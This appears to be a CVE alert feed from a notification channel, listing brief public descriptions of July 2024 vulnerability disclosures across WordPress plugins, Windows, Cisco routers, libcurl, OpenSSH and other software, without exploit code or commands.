🚨 CVE-2024-4707The Materialis Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's materialis_contact_form shortcode in all versions up to, and including, 1.3.41 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-24 18:07:26 |
🚨 CVE-2024-4608The SellKit – Funnel builder and checkout optimizer for WooCommerce to sell more, faster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-24 18:07:25 |
🚨 CVE-2017-7858FreeType 2 before 2017-03-07 has an out-of-bounds write related to the TT_Get_MM_Var function in truetype/ttgxvar.c and the sfnt_init_face function in sfnt/sfobjs.c.🎖@cveNotify |
|
| 2024-07-24 18:07:24 |
🚨 CVE-2017-7857FreeType 2 before 2017-03-08 has an out-of-bounds write caused by a heap-based buffer overflow related to the TT_Get_MM_Var function in truetype/ttgxvar.c and the sfnt_init_face function in sfnt/sfobjs.c.🎖@cveNotify |
|
| 2024-07-24 17:37:36 |
🚨 CVE-2024-38526pdoc provides API Documentation for Python Projects. Documentation generated with `pdoc --math` linked to JavaScript files from polyfill.io. The polyfill.io CDN has been sold and now serves malicious code. This issue has been fixed in pdoc 14.5.1.🎖@cveNotify |
|
| 2024-07-24 17:37:31 |
🚨 CVE-2021-42292Microsoft Excel Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-24 17:37:30 |
🚨 CVE-2021-22204Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image🎖@cveNotify |
|
| 2024-07-24 17:37:26 |
🚨 CVE-2017-8759Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka ".NET Framework Remote Code Execution Vulnerability."🎖@cveNotify |
|
| 2024-07-24 17:37:25 |
🚨 CVE-2017-6327The Symantec Messaging Gateway before 10.6.3-267 can encounter an issue of remote code execution, which describes a situation whereby an individual may obtain the ability to execute commands remotely on a target machine or in a target process. In this type of occurrence, after gaining access to the system, the attacker may attempt to elevate their privileges.🎖@cveNotify |
|
| 2024-07-24 17:07:44 |
🚨 CVE-2018-13382An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests🎖@cveNotify |
|
| 2024-07-24 17:07:43 |
🚨 CVE-2018-8453An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.🎖@cveNotify |
|
| 2024-07-24 17:07:42 |
🚨 CVE-2017-17562Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in cgi.c. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as LD_PRELOAD. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0.🎖@cveNotify |
|
| 2024-07-24 17:07:38 |
🚨 CVE-2016-4437Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.🎖@cveNotify |
|
| 2024-07-24 17:07:37 |
🚨 CVE-2016-3718The (1) HTTP and (2) FTP coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted image.🎖@cveNotify |
|
| 2024-07-24 17:07:32 |
🚨 CVE-2016-0167The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-0143 and CVE-2016-0165.🎖@cveNotify |
|
| 2024-07-24 17:07:31 |
🚨 CVE-2014-7169GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.🎖@cveNotify |
|
| 2024-07-24 17:07:26 |
🚨 CVE-2014-1776Use-after-free vulnerability in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via vectors related to the CMarkup::IsConnectedToPrimaryMarkup function, as exploited in the wild in April 2014. NOTE: this issue originally emphasized VGX.DLL, but Microsoft clarified that "VGX.DLL does not contain the vulnerable code leveraged in this exploit. Disabling VGX.DLL is an exploit-specific workaround that provides an immediate, effective workaround to help block known attacks."🎖@cveNotify |
|
| 2024-07-24 17:07:25 |
🚨 CVE-2006-1547ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.🎖@cveNotify |
|
| 2024-07-24 16:07:31 |
🚨 CVE-2017-10271Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-07-24 16:07:30 |
🚨 CVE-2017-0263The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability."🎖@cveNotify |
|
| 2024-07-24 16:07:26 |
🚨 CVE-2015-2051The D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier allows remote attackers to execute arbitrary commands via a GetDeviceSettings action to the HNAP interface.🎖@cveNotify |
|
| 2024-07-24 16:07:25 |
🚨 CVE-2014-4404Heap-based buffer overflow in IOHIDFamily in Apple iOS before 8 and Apple TV before 7 allows attackers to execute arbitrary code in a privileged context via an application that provides crafted key-mapping properties.🎖@cveNotify |
|
| 2024-07-24 16:07:24 |
🚨 CVE-2014-1761Microsoft Word 2003 SP3, 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT; Word Viewer; Office Compatibility Pack SP3; Office for Mac 2011; Word Automation Services on SharePoint Server 2010 SP1 and SP2 and 2013; Office Web Apps 2010 SP1 and SP2; and Office Web Apps Server 2013 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted RTF data, as exploited in the wild in March 2014.🎖@cveNotify |
|
| 2024-07-24 15:37:31 |
🚨 CVE-2024-7068A vulnerability classified as problematic has been found in SourceCodester Insurance Management System 1.0. This affects an unknown part of the file /Script/admin/core/update_sub_category. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272349 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-24 15:37:30 |
🚨 CVE-2024-39345AdTran 834-5 HDC17600021F1 (SmartOS 11.1.1.1) devices enable the SSH service by default and have a hidden, undocumented, hard-coded support account whose password is based on the devices MAC address. All of the devices internet interfaces share a similar MAC address that only varies in their final octet. This allows network-adjacent attackers to derive the support user's SSH password by decrementing the final octet of the connected gateway address or via the BSSID. An attacker can then execute arbitrary OS commands with root-level privileges.🎖@cveNotify |
|
| 2024-07-24 15:37:26 |
🚨 CVE-2024-31977Adtran 834-5 11.1.0.101-202106231430, and fixed as of SmartOS Version 12.5.5.1, devices allow OS Command Injection via shell metacharacters to the Ping or Traceroute utility.🎖@cveNotify |
|
| 2024-07-24 15:37:25 |
🚨 CVE-2024-38164An improper access control vulnerability in GroupMe allows an a unauthenticated attacker to elevate privileges over a network by convincing a user to click on a malicious link.🎖@cveNotify |
|
| 2024-07-24 15:37:24 |
🚨 CVE-2024-33694Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Meks Meks ThemeForest Smart Widget allows Stored XSS.This issue affects Meks ThemeForest Smart Widget: from n/a through 1.5.🎖@cveNotify |
|
| 2024-07-24 15:07:24 |
🚨 CVE-2024-39891In the Twilio Authy API, accessed by Authy Android before 25.1.0 and Authy iOS before 26.1.0, an unauthenticated endpoint provided access to certain phone-number data, as exploited in the wild in June 2024. Specifically, the endpoint accepted a stream of requests containing phone numbers, and responded with information about whether each phone number was registered with Authy. (Authy accounts were not compromised, however.)🎖@cveNotify |
|
| 2024-07-24 14:37:39 |
🚨 CVE-2016-7193Microsoft Word 2007 SP2, Office 2010 SP2, Word 2013 SP1, Word 2013 RT SP1, Word 2016, Word for Mac 2011, Word 2016 for Mac, Office Compatibility Pack SP3, Word Viewer, Word Automation Services on SharePoint Server 2010 SP2, Word Automation Services on SharePoint Server 2013 SP1, Office Web Apps 2010 SP2, Office Web Apps Server 2013 SP1, and Office Online Server allow remote attackers to execute arbitrary code via a crafted RTF document, aka "Microsoft Office Memory Corruption Vulnerability."🎖@cveNotify |
|
| 2024-07-24 14:37:38 |
🚨 CVE-2016-0099The Secondary Logon Service in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 does not properly process request handles, which allows local users to gain privileges via a crafted application, aka "Secondary Logon Elevation of Privilege Vulnerability."🎖@cveNotify |
|
| 2024-07-24 14:37:37 |
🚨 CVE-2015-4902Unspecified vulnerability in Oracle Java SE 6u101, 7u85, and 8u60 allows remote attackers to affect integrity via unknown vectors related to Deployment.🎖@cveNotify |
|
| 2024-07-24 14:37:34 |
🚨 CVE-2013-5065NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.🎖@cveNotify |
|
| 2024-07-24 14:37:33 |
🚨 CVE-2011-3544Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.🎖@cveNotify |
|
| 2024-07-24 14:37:32 |
🚨 CVE-2011-1889The NSPLookupServiceNext function in the client in Microsoft Forefront Threat Management Gateway (TMG) 2010 allows remote attackers to execute arbitrary code via vectors involving unspecified requests, aka "TMG Firewall Client Memory Corruption Vulnerability."🎖@cveNotify |
|
| 2024-07-24 14:37:31 |
🚨 CVE-2010-0232The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability."🎖@cveNotify |
|
| 2024-07-24 14:07:26 |
🚨 CVE-2022-20700Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2024-07-24 14:07:25 |
🚨 CVE-2022-20699Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2024-07-24 14:07:24 |
🚨 CVE-2018-0180Multiple vulnerabilities in the Login Enhancements (Login Block) feature of Cisco IOS Software could allow an unauthenticated, remote attacker to trigger a reload of an affected system, resulting in a denial of service (DoS) condition. These vulnerabilities affect Cisco devices that are running Cisco IOS Software Release 15.4(2)T, 15.4(3)M, or 15.4(2)CG and later. Cisco Bug IDs: CSCuy32360, CSCuz60599.🎖@cveNotify |
|
| 2024-07-24 13:37:26 |
🚨 CVE-2024-5818The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored DOM-based Cross-Site Scripting via the plugin's Magazine Grid/Slider widget in all versions up to, and including, 1.3.980 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-24 13:37:25 |
🚨 CVE-2022-20708Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2024-07-24 13:37:24 |
🚨 CVE-2022-20703Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2024-07-24 13:07:25 |
🚨 CVE-2024-25638dnsjava is an implementation of DNS in Java. Records in DNS replies are not checked for their relevance to the query, allowing an attacker to respond with RRs from different zones. This vulnerability is fixed in 3.6.0.🎖@cveNotify |
|
| 2024-07-24 11:37:25 |
🚨 CVE-2024-7066A vulnerability was found in F-logic DataCube3 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/config_time_sync.php of the component HTTP POST Request Handler. The manipulation of the argument ntp_server leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272347.🎖@cveNotify |
|
| 2024-07-24 11:37:24 |
🚨 CVE-2024-6896The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.96.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-07-24 10:37:24 |
🚨 CVE-2024-7065A vulnerability was found in Spina CMS up to 2.18.0. It has been classified as problematic. Affected is an unknown function of the file /admin/pages/. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272346 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-24 09:37:25 |
🚨 CVE-2024-6874libcurl's URL API function[curl_url_get()](https://curl.se/libcurl/c/curl_url_get.html) offers punycodeconversions, to and from IDN. Asking to convert a name that is exactly 256bytes, libcurl ends up reading outside of a stack based buffer when built touse the *macidn* IDN backend. The conversion function then fills up theprovided buffer exactly - but does not null terminate the string.This flaw can lead to stack contents accidently getting returned as part ofthe converted string.🎖@cveNotify |
|
| 2024-07-24 09:37:24 |
🚨 CVE-2024-6197libcurl's ASN1 parser has this utf8asn1str() function used for parsing an ASN.1 UTF-8 string. Itcan detect an invalid field and return error. Unfortunately, when doing so it also invokes `free()` on a 4 byte localstack buffer. Most modern malloc implementations detect this error and immediately abort. Some however accept the input pointer and add that memory to its list of available chunks. This leads to the overwriting of nearby stack memory. The content of the overwrite is decided by the `free()` implementation; likely to be memory pointers and a set of flags. The most likely outcome of exploting this flaw is a crash, although it cannot be ruled out that more serious results can be had in special circumstances.🎖@cveNotify |
|
| 2024-07-24 08:37:30 |
🚨 CVE-2024-6197libcurl's ASN1 parser has this utf8asn1str() function used for parsing an ASN.1 UTF-8 string. Itcan detect an invalid field and return error. Unfortunately, when doing so it also invokes `free()` on a 4 byte localstack buffer. Most modern malloc implementations detect this error and immediately abort. Some however accept the input pointer and add that memory to its list of available chunks. This leads to the overwriting of nearby stack memory. The content of the overwrite is decided by the `free()` implementation; likely to be memory pointers and a set of flags. The most likely outcome of exploting this flaw is a crash, although it cannot be ruled out that more serious results can be had in special circumstances.🎖@cveNotify |
|
| 2024-07-24 08:37:26 |
🚨 CVE-2024-3297An issue in the Certificate Authenticated Session Establishment (CASE) protocol for establishing secure sessions between two devices, as implemented in the Matter protocol versions before Matter 1.1 allows an attacker to replay manipulated CASE Sigma1 messages to make the device unresponsive until the device is power-cycled.🎖@cveNotify |
|
| 2024-07-24 08:37:25 |
🚨 CVE-2023-48362XXE in the XML Format Plugin in Apache Drill version 1.19.0 and greater allows a user to read any file on a remote file system or execute commands via a malicious XML file.Users are recommended to upgrade to version 1.21.2, which fixes this issue.🎖@cveNotify |
|
| 2024-07-24 08:37:24 |
🚨 CVE-2023-32471Dell Edge Gateway BIOS, versions 3200 and 5200, contains an out-of-bounds read vulnerability. A local authenticated malicious user with high privileges could potentially exploit this vulnerability to read contents of stack memory and use this information for further exploits.🎖@cveNotify |
|
| 2024-07-24 07:37:25 |
🚨 CVE-2024-6553The WP Meteor Website Speed Optimization Addon plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.4.3.This is due to the plugin utilizing wpdesk and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.🎖@cveNotify |
|
| 2024-07-24 07:37:24 |
🚨 CVE-2023-32466Dell Edge Gateway BIOS, versions 3200 and 5200, contains an out-of-bounds write vulnerability. A local authenticated malicious user with high privileges could potentially exploit this vulnerability leading to exposure of some UEFI code, leading to arbitrary code execution or escalation of privilege.🎖@cveNotify |
|
| 2024-07-24 06:37:24 |
🚨 CVE-2024-6094The WP ULike WordPress plugin before 4.7.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-07-24 05:37:25 |
🚨 CVE-2024-39702In lj_str_hash.c in OpenResty 1.19.3.1 through 1.25.3.1, the string hashing function (used during string interning) allows HashDoS (Hash Denial of Service) attacks. An attacker could cause excessive resource usage during proxy operations via crafted requests, potentially leading to a denial of service with relatively few incoming requests. This vulnerability only exists in the OpenResty fork in the openresty/luajit2 GitHub repository. The LuaJIT/LuaJIT repository. is unaffected.🎖@cveNotify |
|
| 2024-07-24 05:37:24 |
🚨 CVE-2023-4522An issue has been discovered in GitLab affecting all versions before 16.2.0. Committing directories containing LF character results in 500 errors when viewing the commit.🎖@cveNotify |
|
| 2024-07-24 04:37:25 |
🚨 CVE-2024-5861The WP EasyPay – Square for WordPress plugin for WordPress is vulnerable to unauthorized modification of datadue to a missing capability check on the wpep_square_disconnect() function in all versions up to, and including, 4.2.3. This makes it possible for unauthenticated attackers to disconnect square.🎖@cveNotify |
|
| 2024-07-24 04:37:24 |
🚨 CVE-2024-3246The LiteSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0.1. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the token setting and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-07-24 03:37:32 |
🚨 CVE-2024-6755The Social Auto Poster plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the ‘wpw_auto_poster_quick_delete_multiple’ function in all versions up to, and including, 5.3.14. This makes it possible for unauthenticated attackers to delete arbitrary posts.🎖@cveNotify |
|
| 2024-07-24 03:37:25 |
🚨 CVE-2024-6752The Social Auto Poster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wp_name’ parameter in the 'wpw_auto_poster_map_wordpress_post_type' AJAX function in all versions up to, and including, 5.3.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-24 03:37:24 |
🚨 CVE-2024-6750The Social Auto Poster plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 5.3.14. This makes it possible for unauthenticated attackers to add, modify, or delete post meta and plugin options.🎖@cveNotify |
|
| 2024-07-24 03:07:30 |
🚨 CVE-2024-37414Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Depicter Slider and Popup by Averta Depicter Slider allows Stored XSS.This issue affects Depicter Slider: from n/a through 3.0.2.🎖@cveNotify |
|
| 2024-07-24 03:07:26 |
🚨 CVE-2024-37278Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Pratik Chaskar Cards for Beaver Builder.This issue affects Cards for Beaver Builder: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-07-24 03:07:25 |
🚨 CVE-2024-5984A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file book.php. The manipulation of the argument bookisbn leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268460.🎖@cveNotify |
|
| 2024-07-24 03:07:24 |
🚨 CVE-2024-5983A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file bookPerPub.php. The manipulation of the argument pubid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268459.🎖@cveNotify |
|
| 2024-07-24 02:37:24 |
🚨 CVE-2024-5985A vulnerability classified as critical has been found in SourceCodester Best Online News Portal 1.0. This affects an unknown part of the file /admin/index.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268461 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-24 01:07:25 |
🚨 CVE-2024-39891In the Twilio Authy API, accessed by Authy Android before 25.1.0 and Authy iOS before 26.1.0, an unauthenticated endpoint provided access to certain phone-number data, as exploited in the wild in June 2024. Specifically, the endpoint accepted a stream of requests containing phone numbers, and responded with information about whether each phone number was registered with Authy. (Authy accounts were not compromised, however.)🎖@cveNotify |
|
| 2024-07-24 01:07:24 |
🚨 CVE-2012-4792Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly allocated or (2) is deleted, as demonstrated by a CDwnBindInfo object, and exploited in the wild in December 2012.🎖@cveNotify |
|
| 2024-07-23 22:37:32 |
🚨 CVE-2024-38164An improper access control vulnerability in GroupMe allows an a unauthenticated attacker to elevate privileges over a network by convincing a user to click on a malicious link.🎖@cveNotify |
|
| 2024-07-23 22:37:26 |
🚨 CVE-2024-39894OpenSSH 9.5 through 9.7 before 9.8 sometimes allows timing attacks against echo-off password entry (e.g., for su and Sudo) because of an ObscureKeystrokeTiming logic error. Similarly, other timing attacks against keystroke entry could occur.🎖@cveNotify |
|
| 2024-07-23 22:37:25 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-07-23 22:37:24 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-07-23 21:37:32 |
🚨 CVE-2024-39894OpenSSH 9.5 through 9.7 before 9.8 sometimes allows timing attacks against echo-off password entry (e.g., for su and Sudo) because of an ObscureKeystrokeTiming logic error. Similarly, other timing attacks against keystroke entry could occur.🎖@cveNotify |
|
| 2024-07-23 21:37:25 |
🚨 CVE-2024-4705The Testimonials Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's testimonials shortcode in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-23 21:37:24 |
🚨 CVE-2022-23397The Cedar Gate EZ-NET portal 6.5.5 6.8.0 Internet portal has a call to display messages to users which does not properly sanitize data sent in through a URL parameter. This leads to a Reflected Cross-Site Scripting vulnerability. NOTE: the vendor disputes this because the ado.im reference has "no clear steps of reproduction."🎖@cveNotify |
|
| 2024-07-23 21:07:24 |
🚨 CVE-2024-5224The Easy Social Like Box – Popup – Sidebar Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cardoza_facebook_like_box' shortcode in all versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-23 20:07:25 |
🚨 CVE-2024-3668The PowerPack Pro for Elementor plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.10.17. This is due to the plugin not restricting low privileged users from setting a default role for a registration form. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with administrator set as the default role and then register as an administrator.🎖@cveNotify |
|
| 2024-07-23 20:07:24 |
🚨 CVE-2024-5328A Server-Side Request Forgery (SSRF) vulnerability exists in the lunary-ai/lunary application, specifically within the endpoint '/auth/saml/tto/download-idp-xml'. The vulnerability arises due to the application's failure to validate user-supplied URLs before using them in server-side requests. An attacker can exploit this vulnerability by sending a specially crafted request to the affected endpoint, allowing them to make unauthorized requests to internal or external resources. This could lead to the disclosure of sensitive information, service disruption, or further attacks against the network infrastructure. The issue affects the latest version of the application as of the report.🎖@cveNotify |
|
| 2024-07-23 19:37:36 |
🚨 CVE-2024-41178Exposure of temporary credentials in logs in Apache Arrow Rust Object Store (`object_store` crate), version 0.10.1 and earlier on all platforms using AWS WebIdentityTokens. On certain error conditions, the logs may contain the OIDC token passed to AssumeRoleWithWebIdentity https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html . This allows someone with access to the logs to impersonate that identity, including performing their own calls to AssumeRoleWithWebIdentity, until the OIDC token expires. Typically OIDC tokens are valid for up to an hour, although this will vary depending on the issuer.Users are recommended to use a different AWS authentication mechanism, disable logging or upgrade to version 0.10.2, which fixes this issue.Details:When using AWS WebIdentityTokens with the object_store crate, in the event of a failure and automatic retry, the underlying reqwest error, including the full URL with the credentials, potentially in the parameters, is written to the logs. Thanks to Paul Hatcherian for reporting this vulnerability🎖@cveNotify |
|
| 2024-07-23 19:37:35 |
🚨 CVE-2023-52217Missing Authorization vulnerability in weDevs WooCommerce Conversion Tracking.This issue affects WooCommerce Conversion Tracking: from n/a through 2.0.11.🎖@cveNotify |
|
| 2024-07-23 19:37:31 |
🚨 CVE-2018-5279In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9c40e02c. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-07-23 19:37:30 |
🚨 CVE-2017-17520tools/url_handler.pl in TIN 2.4.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has reported that this is intentional behavior, because the documentation states "url_handler.pl was designed to work together with tin which only issues shell escaped absolute URLs.🎖@cveNotify |
|
| 2024-07-23 19:37:26 |
